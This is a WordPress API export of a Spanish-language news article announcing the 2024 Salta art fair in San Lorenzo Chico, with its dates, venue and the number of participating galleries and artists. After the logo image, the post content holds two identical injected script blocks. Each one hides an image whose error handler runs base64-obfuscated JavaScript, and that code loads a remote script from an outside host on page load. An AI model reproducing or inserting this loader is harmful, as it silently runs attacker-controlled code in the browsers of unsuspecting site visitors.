{"id":4249,"date":"2024-07-31T10:28:57","date_gmt":"2024-07-31T13:28:57","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4249"},"modified":"2025-08-13T23:51:44","modified_gmt":"2025-08-14T02:51:44","slug":"feria-de-arte-salta-2024-se-estrenaran-mas-de-250-obras-en-san-lorenzo-chico","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4249","title":{"rendered":"Feria de Arte Salta 2024: se estrenar\u00e1n m\u00e1s de 250 obras en San Lorenzo Chico"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-942c3e1164b5badf493a8e7a31917926\" style=\"background-color:#42024f\"><em>El viernes 2 de agosto, m\u00e1s de 33 galer\u00edas y proyectos de arte pondr\u00e1n a disposici\u00f3n del p\u00fablico, al igual que la obra de 257 artistas del norte del pa\u00eds. La entrada ser\u00e1 gratuita.<\/em><\/h4>\n\n\n\n<p>La Feria de Arte Salta 2024 abrir\u00e1 sus puertas del 2 al &nbsp;4 de agosto, en San Lorenzo Chico. &nbsp;De 15.30 a 20.30 hs, en Punto Corp, ubicado en Av. Yerba Buena, &nbsp;KM 1.1, se realizar\u00e1 un evento sin precedentes para el NOA y Salta en particular. El mismo se concretar\u00e1 por iniciativa de la&nbsp;<strong>Subsecretar\u00eda de Patrimonio Cultural<\/strong>, &nbsp;de la&nbsp;<strong>Secretar\u00eda de Cultura de la Provincia<\/strong>, en conjunto con el grupo ACCIONARTE de Virginia Blaquier, Esteban Drincovich y Alfredo Mu\u00f1oz.<\/p>\n\n\n\n<p>Su realizaci\u00f3n permitir\u00e1 posicionar a Salta en el mapa de ferias de arte del pa\u00eds, difundir el arte contempor\u00e1neo de la Regi\u00f3n, crear un mercado para los artistas, &nbsp;generar un encuentro entre el arte y el p\u00fablico en general en un entorno incre\u00edble, con comodidades y propuestas que har\u00e1n de esta Feria un plan para disfrutar con familia y amigos.<\/p>\n\n\n\n<p>Del mismo participar\u00e1n 33 espacios, de los cuales 28 son galer\u00edas de arte de Salta, Tucum\u00e1n, &nbsp;Jujuy, Santiago del Estero, Santa Fe y Buenos Aires; cinco son proyectos de arte colectivos de Salta, y se suma CASa, Comunidad de Artistas de Salta.<\/p>\n\n\n\n<p>En total, &nbsp;los espacios representar\u00e1n a 257 artistas de la Regi\u00f3n, siendo esta una cifra hist\u00f3rica para el arte local, en eventos de este tipo.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/logo-gobierno-salta-2023.svg\" alt=\"\" style=\"width:169px;height:auto\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El viernes 2 de agosto, m\u00e1s de 33 galer\u00edas y proyectos de arte pondr\u00e1n a disposici\u00f3n del p\u00fablico, al igual que la obra de 257 artistas del norte del pa\u00eds. La entrada ser\u00e1 gratuita. La Feria de Arte Salta 2024 abrir\u00e1 sus puertas del 2 al &nbsp;4 de agosto, en San Lorenzo Chico. &nbsp;De 15.30 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4250,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-4249","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4249"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4249"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4249\/revisions"}],"predecessor-version":[{"id":6726,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4249\/revisions\/6726"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4250"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4249"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4249"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4249"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}